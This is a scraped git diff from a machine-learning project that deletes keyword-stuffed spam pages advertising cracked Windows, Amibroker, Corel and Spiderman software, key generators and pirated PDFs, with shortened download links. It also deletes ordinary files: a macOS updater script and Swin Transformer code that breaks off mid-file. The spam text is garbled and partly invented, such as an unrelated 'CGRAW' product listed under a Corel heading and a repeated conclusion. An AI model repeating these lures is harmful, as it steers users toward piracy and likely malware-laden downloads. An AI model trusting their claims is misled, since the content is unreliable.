      free download windows 8 x64 dvd 915440 iso
      -windows 8 x64 dvd 915440 product key generator
      -how to install windows 8 x64 dvd 915440 on pc
      -windows 8 x64 dvd 915440 activation code
      -windows 8 x64 dvd 915440 torrent download
      -free windows 8 x64 dvd 915440 license key
      -windows 8 x64 dvd 915440 crack download
      -windows 8 x64 dvd 915440 full version download
      -windows 8 x64 dvd 915440 serial number
      -windows 8 x64 dvd 915440 direct download link
      -free download windows 8 x64 dvd 915440 with product key
      -windows 8 x64 dvd 915440 iso file download
      -how to burn windows 8 x64 dvd 915440 to usb
      -windows 8 x64 dvd 915440 bootable usb
      -windows 8 x64 dvd 915440 system requirements
      -free download windows 8 x64 dvd 915440 for mac
      -windows 8 x64 dvd 915440 product key finder
      -how to activate windows 8 x64 dvd 915440 without product key
      -windows 8 x64 dvd 915440 update download
      -windows 8 x64 dvd 915440 features and benefits
      -free download windows 8 x64 dvd 915440 for laptop
      -windows 8 x64 dvd 915440 product key list
      -how to uninstall windows 8 x64 dvd 915440 from pc
      -windows 8 x64 dvd 915440 error fix
      -windows 8 x64 dvd 915440 review and rating
      -free download windows 8 x64 dvd 915440 for android
      -windows 8 x64 dvd 915440 product key online purchase
      -how to upgrade to windows 8 x64 dvd 915440 from windows xp/7/10
      -windows 8 x64 dvd 915440 backup and restore
      -windows 8 x64 dvd 915440 tips and tricks
      -free download windows 8 x64 dvd 915440 for linux
      -windows 8 x64 dvd

      -
        -
      • Using an internet connection. This is the easiest and fastest way to activate Windows 8.1. All you need is a stable internet connection and your product key. Just follow the instructions on the screen when you install Windows 8.1 or when you are prompted to activate it later.
      • -
      • By phone. If you don't have an internet connection or if you have problems activating online, you can use the phone option to activate Windows 8.1. You will need to call a toll-free number and provide your installation ID (a series of numbers displayed on your screen) and your product key. You will then receive a confirmation ID (another series of numbers) that you need to enter on your screen to complete the activation.
      • -
      • Via command prompt. If you are an advanced user or if you have problems activating online or by phone, you can use the command prompt option to activate Windows 8.1. You will need to open an elevated command prompt (right-click on the Start button and select "Command Prompt (Admin)") and type the following command: slmgr.vbs -ipk . Then press Enter. You will see a message saying that your product key has been installed successfully. Then type the following command: slmgr.vbs -ato . Then press Enter again. You will see a message saying that your product has been activated successfully.
      • -
      -

      FAQ

      -

      Here are some frequently asked questions about Windows 8.1:

      -
        -
      1. What is the difference between Windows 8 and Windows 8.1?
        Windows 8.1 is an updated version of Windows 8 that offers many improvements and new features over its predecessor. Some of the main differences are: a better user interface with more customization options; enhanced performance and security; support for 3D printing, ReFS, and DirectX 11.2; new and updated apps and services; and more.
      2. -
      3. How can I check if my PC is compatible with Windows 8.1?
        You can use the Windows Compatibility Center to check if your PC meets the minimum system requirements for Windows 8.1 and if your hardware and software are compatible with it. You can access it from here: https://www.microsoft.com/en-us/windows/compatibility/CompatCenter/Home . You can also use the Upgrade Assistant tool that comes with the Windows 8.1 ISO file to check your PC's compatibility before installing it.
      4. -
      5. How can I update my drivers and software for Windows 8.1?
        You can use the Device Manager to check if your drivers are up to date and to update them if needed. You can access it from the Control Panel or by right-clicking on the Start button and selecting "Device Manager". You can also use the Windows Update service to check for updates for your drivers and software automatically. You can access it from the Settings app or by typing "update" in the search box on the Start screen.
      6. -
      7. How can I troubleshoot common problems with Windows 8.1?
        You can use the Troubleshooting tool to diagnose and fix common problems with Windows 8.1, such as network issues, audio issues, printer issues, etc. You can access it from the Control Panel or by typing "troubleshoot" in the search box on the Start screen.
      8. -
      9. How can I contact Microsoft support for Windows 8.1?
        You can contact Microsoft support for Windows 8.1 by phone, chat, email, or online forums depending on your issue and preference. You can find more information about how to contact Microsoft support from here: https://support.microsoft.com/en-us/contactus/windows/ .
      10. -
      -

      Conclusion

      -

      In conclusion, freedownloadenwindows8x64dvd915440productkey is a way to get a product key for Windows 8.1 operating system without having to pay anything or provide any personal information.

      -

      You can use this product key to download a Windows 8.1 ISO file from Microsoft website for free and create a bootable USB or DVD for installing Windows 8.1 on your PC.

      -

      Windows 8.1 is an improved version of Windows 8 that offers many new features and enhancements that make it one of the best operating systems in the world.

      -

      To activate Windows 8.1, you need to use your product key either online, by phone, or via command prompt.

      -

      If you have any questions or problems with Windows 8.1, you can use various tools and resources to troubleshoot them or contact Microsoft support for assistance.

      -

      We hope this article has helped you understand what freedownloadenwindows8x64dvd915440productkey is and how to use it.

      -

      If you liked this article, please share it with your friends and family who may find it useful.

      -

      0a6ba089eb
      -
      -
      \ No newline at end of file diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Amibroker560crack _HOT_rar.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Amibroker560crack _HOT_rar.md deleted file mode 100644 index b2a56763045072f9d9b229ee828b6f1aa0e2066a..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Amibroker560crack _HOT_rar.md +++ /dev/null @@ -1,6 +0,0 @@ -

      amibroker560crackrar


      Download ✵✵✵ https://urlgoal.com/2uCKnP



      - -NetSim for CCNP is ... amibroker560crackrar Toontrack Keygen Ezdrummer 2 Torrent Central Streaming Ick Mail Merger Toolkit ... Boson Netsim 7 Keigen ... 4d29de3e1b
      -
      -
      -

      diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Corel PhotoMirage 3.2.3.168 Cracked 64 Bit.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Corel PhotoMirage 3.2.3.168 Cracked 64 Bit.md deleted file mode 100644 index 6d8c8043a7d617e91a5633fb5b9494cfc7111ad1..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Corel PhotoMirage 3.2.3.168 Cracked 64 Bit.md +++ /dev/null @@ -1,62 +0,0 @@ -

      Corel PhotoMirage 3.2.3.168 Cracked 64 Bit


      DOWNLOAD ····· https://urlgoal.com/2uCJJ9



      -
      -1 mbsi 1 22/02/2019 0,00 € - -Available on - -Software support of CGRAW - -CGRAW is fully compatible with the PhotoShop®. Furthermore, it is developed to work under both Mac and Windows, therefore it is possible to install it either on a Mac or on a PC. - -Software users will notice that CGRAW and PhotoShop® do not share the same functions. However, if you need to create your images, use the functions available in CGRAW and find the complementary functions in PhotoShop®. - -Be careful to install CGRAW: this software is no longer updated and it is no longer compatible with Windows Vista and Windows XP. - -This product is provided for non-commercial use only. - -You have a licence to install this software on up to two computers (1 laptop and 1 desktop). - -If you want to install more computers, you must purchase a CGRAW licence. - -You have the possibility to export all your image files to open them in other applications, send them to your printer, etc. - -You can easily merge several CGRAW layers (up to 50) in one single image. - -The layer editor is very useful to avoid any color errors. - -CGRAW is developed in France - -CGRAW is developed by Jean-Paul Combalet, CEO of the company. He is interested in computer graphics since the 1980s and he started CGRAW to make a complete work environment in the field of computer graphics. - -Purchasing a CGRAW licence - -After buying a CGRAW licence, you will be able to install and run the software. - -To do so, you can use the licence key directly given to you by the licence vendor. - -You can install multiple licences of CGRAW on one computer. - -List of CGRAW licences - -Activation codes: - -30-day trial period - -CGRAW Professional - -35.00 € - -CGRAW Professional Tour - -90-day trial period - -CGRAW Edition - -45.00 € - -CGRAW Edition Tour - -60.00 € 4fefd39f24
      -
      -
      -

      diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Darwin Ortiz At The Card Table Pdf Download 2021.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Darwin Ortiz At The Card Table Pdf Download 2021.md deleted file mode 100644 index 0e20b935a6e9b971aa6942c7ba1f4e8b39684335..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Darwin Ortiz At The Card Table Pdf Download 2021.md +++ /dev/null @@ -1,51 +0,0 @@ -
      -

      Darwin Ortiz at the Card Table: A Review

      -

      If you are interested in learning card magic and gambling routines from one of the best card handlers in the world, you should definitely check out Darwin Ortiz at the Card Table. This book, published in 1988, is a classic in the field of card table artifice and contains 104 entries covering sleights, techniques, effects and theory.

      -

      Darwin Ortiz At The Card Table Pdf Download


      DOWNLOAD ✏ ✏ ✏ https://urlgoal.com/2uCKHl



      -

      The book is divided into four sections: Card Table Artifice, Pure Magic, Gambling Demonstrations and Theories and Essays. In each section, you will find a wealth of information and advice from Darwin Ortiz, who is widely regarded as a master of card manipulation and deception. You will learn how to perform false deals, shuffles, cuts, switches, palms, controls and more. You will also learn how to apply these skills to create stunning effects such as finding cards at any number, locating multiple selections, dealing winning poker hands and exposing card cheats.

      -

      One of the most impressive features of this book is the level of detail and clarity that Darwin Ortiz provides for each move and effect. He explains not only how to do something, but also why to do it, when to do it and what to avoid. He also gives tips on timing, misdirection, presentation and psychology. The book is illustrated with photographs and drawings by Richard Kaufman, who is also a renowned card expert and author.

      -

      Darwin Ortiz at the Card Table is not a book for beginners. It assumes that you have some basic knowledge of card handling and terminology. It also requires a lot of practice and dedication to master the material. However, if you are willing to put in the effort, you will be rewarded with a deeper understanding of card magic and gambling routines, as well as a higher level of skill and confidence.

      -

      You can download a PDF version of Darwin Ortiz at the Card Table from various online sources. However, we recommend that you buy a hardcover copy from a reputable magic dealer or publisher. This way, you will support the author and the magic community, as well as enjoy a better reading experience.

      -

      Darwin Ortiz at the Card Table is a book that every serious card enthusiast should have in their library. It is a timeless classic that will teach you how to perform card magic and gambling routines with elegance, finesse and deception.

      -

      -

      What You Will Learn from Darwin Ortiz at the Card Table

      -

      Darwin Ortiz at the Card Table is not just a collection of tricks and techniques. It is also a valuable source of knowledge and wisdom from one of the most respected card experts in the world. Darwin Ortiz shares his insights and opinions on various topics related to card magic and gambling, such as:

      -
        -
      • The difference between card table artifice and pure magic, and why they require different approaches and skills.
      • -
      • The importance of naturalness, simplicity and elegance in card handling, and how to achieve them.
      • -
      • The principles of deception, misdirection and psychology, and how to apply them effectively.
      • -
      • The ethics of card magic and gambling, and how to deal with cheaters, hecklers and spectators.
      • -
      • The history and evolution of card magic and gambling, and how to appreciate the contributions of past masters.
      • -
      -

      By reading Darwin Ortiz at the Card Table, you will not only learn how to perform amazing card magic and gambling routines, but also how to think like a card magician and a card cheat. You will develop a deeper understanding of the art and science of card manipulation, and a greater appreciation of the beauty and mystery of cards.

      - -

      Why You Should Read Darwin Ortiz at the Card Table

      -

      If you are serious about card magic and gambling, you owe it to yourself to read Darwin Ortiz at the Card Table. This book is widely considered as one of the best books ever written on the subject, and has influenced many generations of card magicians and gamblers. Here are some of the reasons why you should read this book:

      -
        -
      • It is written by Darwin Ortiz, who is a legend in the field of card magic and gambling. He has over 50 years of experience as a performer, teacher, author and consultant. He has performed for celebrities, royalty, presidents and casinos. He has written several books and produced several videos on card magic and gambling. He is recognized as one of the most authoritative and respected voices in the card world.
      • -
      • It contains some of the most powerful and elegant card magic and gambling routines ever created. You will learn how to perform effects that will astonish and impress any audience, whether they are laymen or magicians. You will also learn how to create your own effects using the principles and techniques taught in the book.
      • -
      • It teaches you more than just tricks and techniques. It also teaches you how to be a better card magician and gambler. You will learn how to improve your presentation, timing, misdirection, psychology, ethics, history and theory. You will also learn how to adapt your skills to different situations and environments.
      • -
      • It is a classic that has stood the test of time. The book was first published in 1988, but it is still relevant and useful today. The tricks and techniques are timeless and universal. The insights and opinions are still valid and valuable. The book has been praised by many experts and reviewers as one of the best books ever written on card magic and gambling.
      • -
      -

      Darwin Ortiz at the Card Table is a book that every serious card enthusiast should read at least once in their lifetime. It is a book that will challenge you, inspire you, educate you and entertain you. It is a book that will change your perspective on card magic and gambling forever.

      -

      How to Download Darwin Ortiz at the Card Table

      -

      If you want to download a PDF version of Darwin Ortiz at the Card Table, you have several options. You can search for the book on various online platforms, such as Google, Amazon, Scribd, DocPlayer and others. However, you should be careful about the quality and legality of the files you download. Some of them may be incomplete, corrupted, outdated or pirated.

      -

      A better option is to buy a digital copy of the book from a reputable magic dealer or publisher. This way, you will get a high-quality and legal PDF file that you can read on your computer, tablet or smartphone. You will also support the author and the magic community, as well as get access to other benefits such as updates, bonuses and discounts.

      -

      Here are some of the places where you can buy a digital copy of Darwin Ortiz at the Card Table:

      -
        -
      • Vanishing Inc. Magic: This is one of the leading online magic shops in the world. They offer a wide range of magic products, including books, videos, downloads and accessories. They also have a blog, a podcast and a magazine. You can buy Darwin Ortiz at the Card Table from their website for $49.99.
      • -
      • Kaufman and Greenberg: This is the original publisher of Darwin Ortiz at the Card Table. They specialize in publishing high-quality books on magic and gambling. They also sell other products by Darwin Ortiz, such as his videos, DVDs and lecture notes. You can buy Darwin Ortiz at the Card Table from their website for $50.
      • -
      • L&L Publishing: This is another well-known publisher of magic books and videos. They have a large catalog of products by many famous magicians and authors. They also offer free shipping on orders over $100. You can buy Darwin Ortiz at the Card Table from their website for $50.
      • -
      -

      No matter which option you choose, you will get a PDF file that you can download instantly after your purchase. You will also get an email confirmation with your order details and a link to download your file. You can then enjoy reading Darwin Ortiz at the Card Table on your preferred device.

      - -

      Conclusion

      -

      Darwin Ortiz at the Card Table is a must-read book for anyone who wants to learn card magic and gambling routines from one of the best card handlers in the world. It contains 104 entries covering sleights, techniques, effects and theory that will teach you how to perform card table artifice and pure magic with elegance, finesse and deception.

      -

      You can download a PDF version of Darwin Ortiz at the Card Table from various online sources, but we recommend that you buy a digital copy from a reputable magic dealer or publisher. This way, you will get a high-quality and legal PDF file that you can read on your computer, tablet or smartphone. You will also support the author and the magic community, as well as enjoy a better reading experience.

      -

      Darwin Ortiz at the Card Table is a book that every serious card enthusiast should read at least once in their lifetime. It is a book that will challenge you, inspire you, educate you and entertain you. It is a book that will change your perspective on card magic and gambling forever.

      -

      Conclusion

      -

      Darwin Ortiz at the Card Table is a must-read book for anyone who wants to learn card magic and gambling routines from one of the best card handlers in the world. It contains 104 entries covering sleights, techniques, effects and theory that will teach you how to perform card table artifice and pure magic with elegance, finesse and deception.

      -

      You can download a PDF version of Darwin Ortiz at the Card Table from various online sources, but we recommend that you buy a digital copy from a reputable magic dealer or publisher. This way, you will get a high-quality and legal PDF file that you can read on your computer, tablet or smartphone. You will also support the author and the magic community, as well as enjoy a better reading experience.

      -

      Darwin Ortiz at the Card Table is a book that every serious card enthusiast should read at least once in their lifetime. It is a book that will challenge you, inspire you, educate you and entertain you. It is a book that will change your perspective on card magic and gambling forever.

      3cee63e6c2
      -
      -
      \ No newline at end of file diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Download Spiderman 3 Pc Game Cracktrmdsfl.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Download Spiderman 3 Pc Game Cracktrmdsfl.md deleted file mode 100644 index 7077209ecfd1855d5634cb475ffcc60d8bd9d18b..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Download Spiderman 3 Pc Game Cracktrmdsfl.md +++ /dev/null @@ -1,31 +0,0 @@ - -

      Spiderman 3 PC Game Trmdsfl: A Review

      -

      If you are a fan of the Spiderman movies and comics, you might be interested in playing Spiderman 3 PC Game Trmdsfl. This is a fan-made modification of the original Spiderman 3 PC game that adds new features, missions, characters, and graphics. In this article, we will review the game and tell you why you should give it a try.

      -

      Download Spiderman 3 Pc Game Cracktrmdsfl


      DOWNLOADhttps://urlgoal.com/2uCKUg



      -

      What is Spiderman 3 PC Game Trmdsfl?

      -

      Spiderman 3 PC Game Trmdsfl is a mod that was created by a group of Spiderman enthusiasts who wanted to improve the original game and make it more faithful to the movie and comic book source material. The mod was released in 2020 and has been downloaded by thousands of players around the world. Some of the main features of the mod are:

      -
        -
      • A new storyline that follows the events of the movie more closely and includes new scenes and dialogues.
      • -
      • New playable characters such as Venom, Sandman, New Goblin, and Black Cat.
      • -
      • New costumes and suits for Spiderman, such as the black suit, the iron spider suit, and the classic red and blue suit.
      • -
      • New abilities and moves for Spiderman, such as web swinging, wall crawling, web zipping, web strike, web pull, web throw, and more.
      • -
      • New enemies and bosses, such as Lizard, Rhino, Scorpion, Electro, Kraven, Vulture, and more.
      • -
      • New locations and environments, such as the Daily Bugle, Oscorp Tower, Central Park, Times Square, Brooklyn Bridge, and more.
      • -
      • New graphics and sound effects that enhance the realism and immersion of the game.
      • -
      -

      How to Download and Install Spiderman 3 PC Game Trmdsfl?

      -

      To play Spiderman 3 PC Game Trmdsfl, you need to have the original Spiderman 3 PC game installed on your computer. You can buy it from Steam or other online platforms. Then, you need to download the mod from its official website or from other trusted sources. The mod comes in a zip file that you need to extract to your game folder. After that, you can launch the game and enjoy the mod.

      -

      What are the Pros and Cons of Spiderman 3 PC Game Trmdsfl?

      -

      Spiderman 3 PC Game Trmdsfl is a great mod that offers a lot of fun and entertainment for Spiderman fans. However, it also has some drawbacks that you should be aware of before playing it. Here are some of the pros and cons of the mod:

      - - - - - - -
      ProsCons
      - More content and variety than the original game.- Some bugs and glitches that may affect the gameplay.
      - More faithful to the movie and comic book source material.- Some missions and scenes may be too difficult or frustrating.
      - More customization options for Spiderman.- Some characters and costumes may not look or sound authentic.
      - More realistic and immersive graphics and sound effects.- Some locations and environments may not be fully detailed or interactive.
      -

      Conclusion

      -

      Spiderman 3 PC Game Trmdsfl is a mod that enhances the original Spiderman 3 PC game and makes it more enjoyable for Spiderman fans. It adds new features, missions, characters, graphics, and more that make the game more diverse and faithful to the movie and comic book source material. If you are looking for a new way to experience Spiderman 3 on your PC, you should definitely check out this mod. You can download it from its official website or from other trusted sources. Have fun!

      -

      d5da3c52bf
      -
      -
      \ No newline at end of file diff --git a/spaces/rfrossard/Image-and-3D-Model-Creator/PIFu/lib/model/__init__.py b/spaces/rfrossard/Image-and-3D-Model-Creator/PIFu/lib/model/__init__.py deleted file mode 100644 index 6709327c4ef99c510a6dbe3ec9fec57a47bb9245..0000000000000000000000000000000000000000 --- a/spaces/rfrossard/Image-and-3D-Model-Creator/PIFu/lib/model/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from .BasePIFuNet import BasePIFuNet -from .VhullPIFuNet import VhullPIFuNet -from .ConvPIFuNet import ConvPIFuNet -from .HGPIFuNet import HGPIFuNet -from .ResBlkPIFuNet import ResBlkPIFuNet diff --git a/spaces/riyueyiming/gpt/run_macOS.command b/spaces/riyueyiming/gpt/run_macOS.command deleted file mode 100644 index 62af07283093d8e580763d7acfe493c3d88e7b08..0000000000000000000000000000000000000000 --- a/spaces/riyueyiming/gpt/run_macOS.command +++ /dev/null @@ -1,25 +0,0 @@ -#!/bin/bash - -# 获取脚本所在目录 -script_dir=$(dirname "$0") - -# 将工作目录更改为脚本所在目录 -cd "$script_dir" - -# 检查Git仓库是否有更新 -git remote update -pwd - -if ! git status -uno | grep 'up to date' > /dev/null; then - # 如果有更新,关闭当前运行的服务器 - pkill -f ChuanhuChatbot.py - - # 拉取最新更改 - git pull - - # 安装依赖 - pip3 install -r requirements.txt - - # 重新启动服务器 - nohup python3 ChuanhuChatbot.py & -fi diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/backbones/swin.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/backbones/swin.py deleted file mode 100644 index b8eccfca195f5d76865d10d7220546eb297ecc99..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/backbones/swin.py +++ /dev/null @@ -1,772 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import warnings -from collections import OrderedDict -from copy import deepcopy - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.checkpoint as cp -from mmcv.cnn import build_norm_layer, constant_init, trunc_normal_init -from mmcv.cnn.bricks.transformer import FFN, build_dropout -from mmcv.cnn.utils.weight_init import trunc_normal_ -from mmcv.runner import BaseModule, ModuleList, _load_checkpoint -from mmcv.utils import to_2tuple - -from ...utils import get_root_logger -from ..builder import BACKBONES -from ..utils.ckpt_convert import swin_converter -from ..utils.transformer import PatchEmbed, PatchMerging - - -class WindowMSA(BaseModule): - """Window based multi-head self-attention (W-MSA) module with relative - position bias. - - Args: - embed_dims (int): Number of input channels. - num_heads (int): Number of attention heads. - window_size (tuple[int]): The height and width of the window. - qkv_bias (bool, optional): If True, add a learnable bias to q, k, v. - Default: True. - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - attn_drop_rate (float, optional): Dropout ratio of attention weight. - Default: 0.0 - proj_drop_rate (float, optional): Dropout ratio of output. Default: 0. - init_cfg (dict | None, optional): The Config for initialization. - Default: None. - """ - - def __init__(self, - embed_dims, - num_heads, - window_size, - qkv_bias=True, - qk_scale=None, - attn_drop_rate=0., - proj_drop_rate=0., - init_cfg=None): - - super().__init__() - self.embed_dims = embed_dims - self.window_size = window_size # Wh, Ww - self.num_heads = num_heads - head_embed_dims = embed_dims // num_heads - self.scale = qk_scale or head_embed_dims**-0.5 - self.init_cfg = init_cfg - - # define a parameter table of relative position bias - self.relative_position_bias_table = nn.Parameter( - torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), - num_heads)) # 2*Wh-1 * 2*Ww-1, nH - - # About 2x faster than original impl - Wh, Ww = self.window_size - rel_index_coords = self.double_step_seq(2 * Ww - 1, Wh, 1, Ww) - rel_position_index = rel_index_coords + rel_index_coords.T - rel_position_index = rel_position_index.flip(1).contiguous() - self.register_buffer('relative_position_index', rel_position_index) - - self.qkv = nn.Linear(embed_dims, embed_dims * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop_rate) - self.proj = nn.Linear(embed_dims, embed_dims) - self.proj_drop = nn.Dropout(proj_drop_rate) - - self.softmax = nn.Softmax(dim=-1) - - def init_weights(self): - trunc_normal_(self.relative_position_bias_table, std=0.02) - - def forward(self, x, mask=None): - """ - Args: - - x (tensor): input features with shape of (num_windows*B, N, C) - mask (tensor | None, Optional): mask with shape of (num_windows, - Wh*Ww, Wh*Ww), value should be between (-inf, 0]. - """ - B, N, C = x.shape - qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, - C // self.num_heads).permute(2, 0, 3, 1, 4) - # make torchscript happy (cannot use tensor as tuple) - q, k, v = qkv[0], qkv[1], qkv[2] - - q = q * self.scale - attn = (q @ k.transpose(-2, -1)) - - relative_position_bias = self.relative_position_bias_table[ - self.relative_position_index.view(-1)].view( - self.window_size[0] * self.window_size[1], - self.window_size[0] * self.window_size[1], - -1) # Wh*Ww,Wh*Ww,nH - relative_position_bias = relative_position_bias.permute( - 2, 0, 1).contiguous() # nH, Wh*Ww, Wh*Ww - attn = attn + relative_position_bias.unsqueeze(0) - - if mask is not None: - nW = mask.shape[0] - attn = attn.view(B // nW, nW, self.num_heads, N, - N) + mask.unsqueeze(1).unsqueeze(0) - attn = attn.view(-1, self.num_heads, N, N) - attn = self.softmax(attn) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - - @staticmethod - def double_step_seq(step1, len1, step2, len2): - seq1 = torch.arange(0, step1 * len1, step1) - seq2 = torch.arange(0, step2 * len2, step2) - return (seq1[:, None] + seq2[None, :]).reshape(1, -1) - - -class ShiftWindowMSA(BaseModule): - """Shifted Window Multihead Self-Attention Module. - - Args: - embed_dims (int): Number of input channels. - num_heads (int): Number of attention heads. - window_size (int): The height and width of the window. - shift_size (int, optional): The shift step of each window towards - right-bottom. If zero, act as regular window-msa. Defaults to 0. - qkv_bias (bool, optional): If True, add a learnable bias to q, k, v. - Default: True - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Defaults: None. - attn_drop_rate (float, optional): Dropout ratio of attention weight. - Defaults: 0. - proj_drop_rate (float, optional): Dropout ratio of output. - Defaults: 0. - dropout_layer (dict, optional): The dropout_layer used before output. - Defaults: dict(type='DropPath', drop_prob=0.). - init_cfg (dict, optional): The extra config for initialization. - Default: None. - """ - - def __init__(self, - embed_dims, - num_heads, - window_size, - shift_size=0, - qkv_bias=True, - qk_scale=None, - attn_drop_rate=0, - proj_drop_rate=0, - dropout_layer=dict(type='DropPath', drop_prob=0.), - init_cfg=None): - super().__init__(init_cfg) - - self.window_size = window_size - self.shift_size = shift_size - assert 0 <= self.shift_size < self.window_size - - self.w_msa = WindowMSA( - embed_dims=embed_dims, - num_heads=num_heads, - window_size=to_2tuple(window_size), - qkv_bias=qkv_bias, - qk_scale=qk_scale, - attn_drop_rate=attn_drop_rate, - proj_drop_rate=proj_drop_rate, - init_cfg=None) - - self.drop = build_dropout(dropout_layer) - - def forward(self, query, hw_shape): - B, L, C = query.shape - H, W = hw_shape - assert L == H * W, 'input feature has wrong size' - query = query.view(B, H, W, C) - - # pad feature maps to multiples of window size - pad_r = (self.window_size - W % self.window_size) % self.window_size - pad_b = (self.window_size - H % self.window_size) % self.window_size - query = F.pad(query, (0, 0, 0, pad_r, 0, pad_b)) - H_pad, W_pad = query.shape[1], query.shape[2] - - # cyclic shift - if self.shift_size > 0: - shifted_query = torch.roll( - query, - shifts=(-self.shift_size, -self.shift_size), - dims=(1, 2)) - - # calculate attention mask for SW-MSA - img_mask = torch.zeros((1, H_pad, W_pad, 1), device=query.device) - h_slices = (slice(0, -self.window_size), - slice(-self.window_size, - -self.shift_size), slice(-self.shift_size, None)) - w_slices = (slice(0, -self.window_size), - slice(-self.window_size, - -self.shift_size), slice(-self.shift_size, None)) - cnt = 0 - for h in h_slices: - for w in w_slices: - img_mask[:, h, w, :] = cnt - cnt += 1 - - # nW, window_size, window_size, 1 - mask_windows = self.window_partition(img_mask) - mask_windows = mask_windows.view( - -1, self.window_size * self.window_size) - attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) - attn_mask = attn_mask.masked_fill(attn_mask != 0, - float(-100.0)).masked_fill( - attn_mask == 0, float(0.0)) - else: - shifted_query = query - attn_mask = None - - # nW*B, window_size, window_size, C - query_windows = self.window_partition(shifted_query) - # nW*B, window_size*window_size, C - query_windows = query_windows.view(-1, self.window_size**2, C) - - # W-MSA/SW-MSA (nW*B, window_size*window_size, C) - attn_windows = self.w_msa(query_windows, mask=attn_mask) - - # merge windows - attn_windows = attn_windows.view(-1, self.window_size, - self.window_size, C) - - # B H' W' C - shifted_x = self.window_reverse(attn_windows, H_pad, W_pad) - # reverse cyclic shift - if self.shift_size > 0: - x = torch.roll( - shifted_x, - shifts=(self.shift_size, self.shift_size), - dims=(1, 2)) - else: - x = shifted_x - - if pad_r > 0 or pad_b: - x = x[:, :H, :W, :].contiguous() - - x = x.view(B, H * W, C) - - x = self.drop(x) - return x - - def window_reverse(self, windows, H, W): - """ - Args: - windows: (num_windows*B, window_size, window_size, C) - H (int): Height of image - W (int): Width of image - Returns: - x: (B, H, W, C) - """ - window_size = self.window_size - B = int(windows.shape[0] / (H * W / window_size / window_size)) - x = windows.view(B, H // window_size, W // window_size, window_size, - window_size, -1) - x = x.permute(0, 1, 3, 2, 4, 5).contiguous().view(B, H, W, -1) - return x - - def window_partition(self, x): - """ - Args: - x: (B, H, W, C) - Returns: - windows: (num_windows*B, window_size, window_size, C) - """ - B, H, W, C = x.shape - window_size = self.window_size - x = x.view(B, H // window_size, window_size, W // window_size, - window_size, C) - windows = x.permute(0, 1, 3, 2, 4, 5).contiguous() - windows = windows.view(-1, window_size, window_size, C) - return windows - - -class SwinBlock(BaseModule): - """" - Args: - embed_dims (int): The feature dimension. - num_heads (int): Parallel attention heads. - feedforward_channels (int): The hidden dimension for FFNs. - window_size (int, optional): The local window scale. Default: 7. - shift (bool, optional): whether to shift window or not. Default False. - qkv_bias (bool, optional): enable bias for qkv if True. Default: True. - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - drop_rate (float, optional): Dropout rate. Default: 0. - attn_drop_rate (float, optional): Attention dropout rate. Default: 0. - drop_path_rate (float, optional): Stochastic depth rate. Default: 0. - act_cfg (dict, optional): The config dict of activation function. - Default: dict(type='GELU'). - norm_cfg (dict, optional): The config dict of normalization. - Default: dict(type='LN'). - with_cp (bool, optional): Use checkpoint or not. Using checkpoint - will save some memory while slowing down the training speed. - Default: False. - init_cfg (dict | list | None, optional): The init config. - Default: None. - """ - - def __init__(self, - embed_dims, - num_heads, - feedforward_channels, - window_size=7, - shift=False, - qkv_bias=True, - qk_scale=None, - drop_rate=0., - attn_drop_rate=0., - drop_path_rate=0., - act_cfg=dict(type='GELU'), - norm_cfg=dict(type='LN'), - with_cp=False, - init_cfg=None): - - super(SwinBlock, self).__init__() - - self.init_cfg = init_cfg - self.with_cp = with_cp - - self.norm1 = build_norm_layer(norm_cfg, embed_dims)[1] - self.attn = ShiftWindowMSA( - embed_dims=embed_dims, - num_heads=num_heads, - window_size=window_size, - shift_size=window_size // 2 if shift else 0, - qkv_bias=qkv_bias, - qk_scale=qk_scale, - attn_drop_rate=attn_drop_rate, - proj_drop_rate=drop_rate, - dropout_layer=dict(type='DropPath', drop_prob=drop_path_rate), - init_cfg=None) - - self.norm2 = build_norm_layer(norm_cfg, embed_dims)[1] - self.ffn = FFN( - embed_dims=embed_dims, - feedforward_channels=feedforward_channels, - num_fcs=2, - ffn_drop=drop_rate, - dropout_layer=dict(type='DropPath', drop_prob=drop_path_rate), - act_cfg=act_cfg, - add_identity=True, - init_cfg=None) - - def forward(self, x, hw_shape): - - def _inner_forward(x): - identity = x - x = self.norm1(x) - x = self.attn(x, hw_shape) - - x = x + identity - - identity = x - x = self.norm2(x) - x = self.ffn(x, identity=identity) - - return x - - if self.with_cp and x.requires_grad: - x = cp.checkpoint(_inner_forward, x) - else: - x = _inner_forward(x) - - return x - - -class SwinBlockSequence(BaseModule): - """Implements one stage in Swin Transformer. - - Args: - embed_dims (int): The feature dimension. - num_heads (int): Parallel attention 